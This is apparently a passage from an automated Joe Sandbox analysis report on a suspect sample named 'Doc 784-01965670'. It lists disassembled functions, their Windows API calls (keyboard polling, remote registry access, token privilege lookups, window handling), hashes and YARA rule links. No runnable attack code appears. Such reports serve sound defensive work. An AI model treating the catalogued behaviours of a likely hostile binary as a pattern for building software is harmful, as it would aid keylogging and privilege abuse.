                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseOpen$EnumFromQueryStringValue__wcsicoll_wcslen
                                                                                                                                    • String ID: ($interface$interface\
                                                                                                                                    • API String ID: 2231185022-3327702407
                                                                                                                                    • Opcode ID: f3ba987632fb2ab980929a1e8c26c1d4f1068388d2a95cb25d4e52b6d927b3fe
                                                                                                                                    • Instruction ID: 2ed788c9a442d2de66cb2a0eaf665167c450c6ff9570aaff4df7cfaf3afbbce1
                                                                                                                                    • Opcode Fuzzy Hash: f3ba987632fb2ab980929a1e8c26c1d4f1068388d2a95cb25d4e52b6d927b3fe
                                                                                                                                    • Instruction Fuzzy Hash: CE317271204305ABE710DF54DD85F6BB3E8FB84744F10492DF685A6191EAB8E908C76A
                                                                                                                                    Function 00436582 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 79networkCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _wcscpy$Cleanup$Startup_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                                    • String ID: 0.0.0.0
                                                                                                                                    • API String ID: 2691793716-3771769585
                                                                                                                                    • Opcode ID: 65646d0c3f70c30576c3209c49215e1e6413ca059fa52035c9da78ad10046a0d
                                                                                                                                    • Instruction ID: 29d249c793a1599df1911ffab6ed89036a29d54f41df1114d8fa63e2d2305339
                                                                                                                                    • Opcode Fuzzy Hash: 65646d0c3f70c30576c3209c49215e1e6413ca059fa52035c9da78ad10046a0d
                                                                                                                                    • Instruction Fuzzy Hash: 5C21D4726003016BD620FB269C42FFF33A89FD4318F54492FF64456242EABDD58983AB
                                                                                                                                    Function 00416B12 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 57libraryloaderCOMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048C968,0000000C,00416C4D,00000000,00000000,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416B24
                                                                                                                                    • __crt_waiting_on_module_handle.LIBCMT ref: 00416B2F
                                                                                                                                      • Part of subcall function 0041177F: Sleep.KERNEL32(000003E8,?,?,00416A38,KERNEL32.DLL,?,00411B0C,?,00413973,00411739,?,?,00411739,?,00401C0B), ref: 0041178B
                                                                                                                                      • Part of subcall function 0041177F: GetModuleHandleW.KERNEL32(00411739,?,?,00416A38,KERNEL32.DLL,?,00411B0C,?,00413973,00411739,?,?,00411739,?,00401C0B), ref: 00411794
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00416B58
                                                                                                                                    • GetProcAddress.KERNEL32(00411739,DecodePointer), ref: 00416B68
                                                                                                                                    • __lock.LIBCMT ref: 00416B8A
                                                                                                                                    • InterlockedIncrement.KERNEL32(00EA60FF), ref: 00416B97
                                                                                                                                    • __lock.LIBCMT ref: 00416BAB
                                                                                                                                    • ___addlocaleref.LIBCMT ref: 00416BC9
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                                                                                                                    • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                                                                                    • API String ID: 1028249917-2843748187
                                                                                                                                    • Opcode ID: 149215eb9963fdce733e6eee9b7d54027110d9b9ecd285c2a82fe369659baa59
                                                                                                                                    • Instruction ID: dfb830706c011728ae11a8c0f52cb2fa371409e71f4acd403326aacb15a29bdd
                                                                                                                                    • Opcode Fuzzy Hash: 149215eb9963fdce733e6eee9b7d54027110d9b9ecd285c2a82fe369659baa59
                                                                                                                                    • Instruction Fuzzy Hash: 4E119671944701AFD720EF76C905B9EBBE0AF00714F10495FE469A6391DB78A580CB1D
                                                                                                                                    Function 0044920C Relevance: 18.2, APIs: 12, Instructions: 243windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32(?,00000000,000000FF,?), ref: 0044931D
                                                                                                                                    • SendMessageW.USER32(?,0045BBB0,00000000,00000000), ref: 0044932D
                                                                                                                                    • CharNextW.USER32(?,?,?,?,0045BBB0,00000000,00000000,?,?), ref: 00449361
                                                                                                                                    • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449375
                                                                                                                                    • SendMessageW.USER32(?,00000402,?), ref: 0044941C
                                                                                                                                    • SendMessageW.USER32(004A83D8,000000C2,00000001,?), ref: 004494A0
                                                                                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449515
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$CharNext
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1350042424-0
                                                                                                                                    • Opcode ID: 5fd89deb92f75c0e0d7406111af65340a6b95ffecf1ba9c2db83920ef449de6e
                                                                                                                                    • Instruction ID: cf19a455924c4199ae2d31ef2e344bdd2865620a2145bd440d1f5c61272ee54d
                                                                                                                                    • Opcode Fuzzy Hash: 5fd89deb92f75c0e0d7406111af65340a6b95ffecf1ba9c2db83920ef449de6e
                                                                                                                                    • Instruction Fuzzy Hash: 5D81B5312083019BE720DF15DC85FBBB7E4EBD9B20F00492EFA54962C0D7B99946D766
                                                                                                                                    Function 00453B94 Relevance: 18.2, APIs: 12, Instructions: 188keyboardCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetKeyboardState.USER32(?,?,00000000), ref: 00453C0D
                                                                                                                                    • SetKeyboardState.USER32(?), ref: 00453C5A
                                                                                                                                    • GetAsyncKeyState.USER32(000000A0), ref: 00453C82
                                                                                                                                    • GetKeyState.USER32(000000A0), ref: 00453C99
                                                                                                                                    • GetAsyncKeyState.USER32(000000A1), ref: 00453CC9
                                                                                                                                    • GetKeyState.USER32(000000A1), ref: 00453CDA
                                                                                                                                    • GetAsyncKeyState.USER32(00000011), ref: 00453D07
                                                                                                                                    • GetKeyState.USER32(00000011), ref: 00453D15
                                                                                                                                    • GetAsyncKeyState.USER32(00000012), ref: 00453D3F
                                                                                                                                    • GetKeyState.USER32(00000012), ref: 00453D4D
                                                                                                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00453D77
                                                                                                                                    • GetKeyState.USER32(0000005B), ref: 00453D85
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: State$Async$Keyboard
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 541375521-0
                                                                                                                                    • Opcode ID: 439544d7db57c6269f5a832870b7215b314e2d5ec2fc8731d7b6f8ebe45629c5
                                                                                                                                    • Instruction ID: 09d2c23b2f41f951af40c960ff4fa7a39ed3d74d48f5bb091813d5d41b5bf946
                                                                                                                                    • Opcode Fuzzy Hash: 439544d7db57c6269f5a832870b7215b314e2d5ec2fc8731d7b6f8ebe45629c5
                                                                                                                                    • Instruction Fuzzy Hash: BD5108311497C42AF731EF6048217A7BBE45F52782F488D5EE9C107283E619AB0C976B
                                                                                                                                    Function 00437DB1 Relevance: 18.2, APIs: 12, Instructions: 180COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 00437DD7
                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00437DE9
                                                                                                                                    • MoveWindow.USER32(00000000,0000000A,?,?,?,00000000), ref: 00437E5C
                                                                                                                                    • GetDlgItem.USER32(?,00000002), ref: 00437E70
                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00437E82
                                                                                                                                    • MoveWindow.USER32(00000000,?,00000000,?,?,00000000), ref: 00437EDB
                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00437EEA
                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00437EFC
                                                                                                                                    • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00437F46
                                                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 00437F55
                                                                                                                                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 00437F6E
                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00437F78
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3096461208-0
                                                                                                                                    • Opcode ID: 85b2574db82c4a067caaf632f6dab2f3668a9f7fdedc9eb4d1c33f4a9692aa02
                                                                                                                                    • Instruction ID: 6334a21bf5495bf578199e0a0c43900503e40640961724061e29feeedb49a886
                                                                                                                                    • Opcode Fuzzy Hash: 85b2574db82c4a067caaf632f6dab2f3668a9f7fdedc9eb4d1c33f4a9692aa02
                                                                                                                                    • Instruction Fuzzy Hash: 46511CB16083069FC318DF68DD85A2BB7E9ABC8300F144A2DF985D3391E6B4ED058B95
                                                                                                                                    Function 00436879 Relevance: 18.1, APIs: 12, Instructions: 115COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 136442275-0
                                                                                                                                    • Opcode ID: 8bb1124220d8f68122d0f1a8633f784f40ed2a0c71bdd1f95919e960fb23027d
                                                                                                                                    • Instruction ID: e47e2093bf76b35e8f1fec89578fc46911e8a4506192668d3a16ce6d5165f020
                                                                                                                                    • Opcode Fuzzy Hash: 8bb1124220d8f68122d0f1a8633f784f40ed2a0c71bdd1f95919e960fb23027d
                                                                                                                                    • Instruction Fuzzy Hash: 744124B2408345ABC235E754C885EEF73ECABD8314F44891EB68D42141EB796688C7A7
                                                                                                                                    Function 0046B39A Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 401registryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B479
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ConnectRegistry_wcslen
                                                                                                                                    • String ID: HH
                                                                                                                                    • API String ID: 535477410-2761332787
                                                                                                                                    • Opcode ID: dd977f09bea9308b610c7238e96fb584538275b520f46e9374bb1ad9d3878166
                                                                                                                                    • Instruction ID: 7a368be733395892e28f24b11b3b05e85d853a2cd395d98498a1c99032eed9d9
                                                                                                                                    • Opcode Fuzzy Hash: dd977f09bea9308b610c7238e96fb584538275b520f46e9374bb1ad9d3878166
                                                                                                                                    • Instruction Fuzzy Hash: 63E171B1604200ABC714EF28C981F1BB7E4EF88704F148A1EF685DB381D779E945CB9A
                                                                                                                                    Function 00460473 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 255COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 004604B5
                                                                                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 004604F1
                                                                                                                                    • _wcslen.LIBCMT ref: 00460502
                                                                                                                                    • CharUpperBuffW.USER32(?,00000000), ref: 00460510
                                                                                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 00460589
                                                                                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 004605C2
                                                                                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 00460606
                                                                                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 0046063E
                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 004606AD
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen
                                                                                                                                    • String ID: ThumbnailClass
                                                                                                                                    • API String ID: 4123061591-1241985126
                                                                                                                                    • Opcode ID: d81b9eb1014bf0c552f647121340d293adfb5e43e55e37c5a686eb3c785bede7
                                                                                                                                    • Instruction ID: b645ef8d54a60b7d8a856e9fdf4d8999e4c56e3b903fe9b51be5921097eabf2a
                                                                                                                                    • Opcode Fuzzy Hash: d81b9eb1014bf0c552f647121340d293adfb5e43e55e37c5a686eb3c785bede7
                                                                                                                                    • Instruction Fuzzy Hash: 3F91B0715043019FDB14DF24C884BAB77A8EF84715F04896FFD85AA281E778E905CBAB
                                                                                                                                    Function 0046F50B Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 157windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00456354: GetCursorPos.USER32(004A83D8), ref: 0045636A
                                                                                                                                      • Part of subcall function 00456354: ScreenToClient.USER32(004A83D8,?), ref: 0045638A
                                                                                                                                      • Part of subcall function 00456354: GetAsyncKeyState.USER32(?), ref: 004563D0
                                                                                                                                      • Part of subcall function 00456354: GetAsyncKeyState.USER32(?), ref: 004563DC
                                                                                                                                    • DefDlgProcW.USER32(?,00000205,?,?,004A83D8,00000000,00000001,004A83D8,?), ref: 0046F55F
                                                                                                                                    • ImageList_DragLeave.COMCTL32(00000000,004A83D8,00000000,00000001,004A83D8,?), ref: 0046F57D
                                                                                                                                    • ImageList_EndDrag.COMCTL32 ref: 0046F583
                                                                                                                                    • ReleaseCapture.USER32 ref: 0046F589
                                                                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 0046F620
                                                                                                                                    • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0046F630
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                                                                                                                                    • String ID: @GUI_DRAGFILE$@GUI_DROPID$HH
                                                                                                                                    • API String ID: 2483343779-2060113733
                                                                                                                                    • Opcode ID: 5127d0ffcd17cb1bef4f2f1971358f36b919fc832d8745dd5c7fc1032c5585dd
                                                                                                                                    • Instruction ID: 4b94e37398fb4c0e8bf176de98e3888209b69965db7f8e5b86c8cb252d1f017b
                                                                                                                                    • Opcode Fuzzy Hash: 5127d0ffcd17cb1bef4f2f1971358f36b919fc832d8745dd5c7fc1032c5585dd
                                                                                                                                    • Instruction Fuzzy Hash: EB5106716043119BD700DF18DC85FAF77A5EB89310F04492EF941973A2DB789D49CBAA
                                                                                                                                    Function 0046FD7F Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 143windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 0046FD8A
                                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,004A83D8,?), ref: 0046FDF0
                                                                                                                                    • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 0046FE0E
                                                                                                                                    • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,004A83D8,?), ref: 0046FE20
                                                                                                                                    • SendMessageW.USER32(?,0000113E,00000000,?), ref: 0046FEA5
                                                                                                                                    • SendMessageW.USER32(?,0000113F,00000000,?), ref: 0046FEDF
                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0046FEF2
                                                                                                                                    • RedrawWindow.USER32(?,?,00000000,00000000), ref: 0046FF02
                                                                                                                                    • DestroyIcon.USER32(?), ref: 0046FFCC
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                                                                                                                                    • String ID: 2
                                                                                                                                    • API String ID: 1331449709-450215437
                                                                                                                                    • Opcode ID: 0839cb131ab93339cce718f32a9fb856b385d6e902e652cc812f2dbbb554e4d7
                                                                                                                                    • Instruction ID: e79942d1a0196d9b5e30c5c178d8ccafd59c9ae1e7fac48b8759c586c5a3b44e
                                                                                                                                    • Opcode Fuzzy Hash: 0839cb131ab93339cce718f32a9fb856b385d6e902e652cc812f2dbbb554e4d7
                                                                                                                                    • Instruction Fuzzy Hash: EB51AC702043019FD320CF44D885BAABBE5FB88700F04487EE684872A2D7B5A849CB5A
                                                                                                                                    Function 00450E7D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • DestroyWindow.USER32(?,?,?,?,?,?,00000000,static,00000000,00000000,?,?,00000000,00000000,?,00000000), ref: 00450EE1
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: DestroyWindow
                                                                                                                                    • String ID: static
                                                                                                                                    • API String ID: 3375834691-2160076837
                                                                                                                                    • Opcode ID: 88f11647011456fbb04f7235260bd1d02a964e72c1c4e3b3fb6640230c73d37f
                                                                                                                                    • Instruction ID: 4605c95b1b006c90d65e271c0fdf07f62d21d56273c2870bf7f2e3decf5281c5
                                                                                                                                    • Opcode Fuzzy Hash: 88f11647011456fbb04f7235260bd1d02a964e72c1c4e3b3fb6640230c73d37f
                                                                                                                                    • Instruction Fuzzy Hash: 4531B572200300BBD7109B64DC45F6BB3A8EBC9711F204A2EFA50D72C0D7B4E8048B69
                                                                                                                                    Function 004393E2 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 109threadCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetCurrentProcess.KERNEL32(00000008,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439409
                                                                                                                                    • OpenThreadToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?), ref: 0043940C
                                                                                                                                    • GetCurrentProcess.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?), ref: 0043941D
                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?), ref: 00439420
                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeAssignPrimaryTokenPrivilege,?), ref: 0043945B
                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeIncreaseQuotaPrivilege,?), ref: 00439474
                                                                                                                                    • _memcmp.LIBCMT ref: 004394A9
                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004394F8
                                                                                                                                    Strings
                                                                                                                                    • SeIncreaseQuotaPrivilege, xrefs: 0043946A
                                                                                                                                    • SeAssignPrimaryTokenPrivilege, xrefs: 00439455
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
